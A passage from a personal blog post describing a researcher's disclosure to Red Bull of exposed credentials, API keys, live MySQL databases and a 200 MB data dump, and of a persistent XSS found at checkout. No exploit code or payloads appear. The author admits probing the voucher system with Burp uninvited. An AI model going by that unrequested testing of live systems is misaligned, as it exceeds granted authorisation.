kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/red.jpg" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1920" height="1187" srcset="https://flaviu.io/content/images/size/w600/2020/09/red.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/09/red.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/09/red.jpg 1600w, https://flaviu.io/content/images/2020/09/red.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Red Bull drink</figcaption></figure><p>Sometime later I came across some interesting files that peaked my interest.. this time they were json jwt tokens ..and yet again a magic js file however this time I struck lucky because it had credentials to endpoints, a few api secret keys and a couple MySQL databases that were valid and populated with data. Wow... I thought this one must be worthwhile reporting! </p><p>Also as a surprise the drinks finally arrived...!</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/drinks.jpg" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="360" height="480"><figcaption>Red Bull reward</figcaption></figure><p>I do remember Mark saying in an e-mail .. &apos;do enjoy the drinks when they arrive&apos;</p><p>I really liked the <a href="https://www.redbull.com/us-en/energydrink/red-bull-summer-edition">Red Bull Watermelon Summer Edition</a>, Cheers!</p><p>My hunt was not finished yet. I kept looking around and unbelievably came across &#xA0;a MySQL dump of 200 MB and this was a goldmine. You can imagine what kind of data was inside this dump.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/gold.jpg" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1920" height="1080" srcset="https://flaviu.io/content/images/size/w600/2020/09/gold.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/09/gold.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/09/gold.jpg 1600w, https://flaviu.io/content/images/2020/09/gold.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Rainbow, pot of gold!</figcaption></figure><p>I had decided this was enough for me and started putting everything together in a &#xA0;new report for the Red Bull Security Team. </p><p>Finished, Sent.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-5.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1067" height="316" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-5.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-5.png 1000w, https://flaviu.io/content/images/2020/09/image-5.png 1067w" sizes="(min-width: 720px) 720px"><figcaption>Email from Mark - Red Bull Security Team</figcaption></figure><p>Perfect.. I was satisfied that my findings were useful to them and that they were working on fixing those. </p><p>Reward update</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-6.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1145" height="228" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-6.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-6.png 1000w, https://flaviu.io/content/images/2020/09/image-6.png 1145w" sizes="(min-width: 720px) 720px"><figcaption>Reward increase from &#xA3;100 to &#xA3;300</figcaption></figure><p>This was great news to me as I really wanted to get some nice Red Bull Formula 1 merchandise and I felt that this amount will be enough for a couple items from their shop. </p><p>Mark was amazing to deal with and he got me the voucher, I&apos;ll admit I couldn&apos;t help myself but to mess around with a couple burp requests and check out how this voucher worked. I couldn&apos;t really do much to fool the system in any way, especially with my little knowledge about APIs, however I found a point where I could inject js/html and achieve persistent XSS during the checkout process. I&apos;ve informed Mark about it, he replied back that they are already working on it as it has been reported by a previous individual. I then placed the order, it was delivered to me fast even though I only used regular delivery &apos;free&apos;!</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/merch.jpg" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="2000" height="2667" srcset="https://flaviu.io/content/images/size/w600/2020/09/merch.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/09/merch.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/09/merch.jpg 1600w, https://flaviu.io/content/images/size/w2400/2020/09/merch.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption>Red Bull merchandise - reward</figcaption></figure><p>A couple thoughts I&apos;d like to share about Red Bull. I wasn&apos;t aware of how big this company is until now, and just how many events they are involved in trust me when I say Red bull is huge.</p><blockquote>This blog post is not sponsored! </blockquote><p>I am glad that I got my first bounty from Red Bull because the company was really nice to deal with and they were quick in their correspondence, also Mark was very pleasant to engage with. </p><p>Red Bull is currently working on a BugBounty program, so they can track, and send non-monetary rewards out to everyone who earned it.</p><!--kg-card-begin: markdown--><p>Have you got any suggestions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item></channel></rss>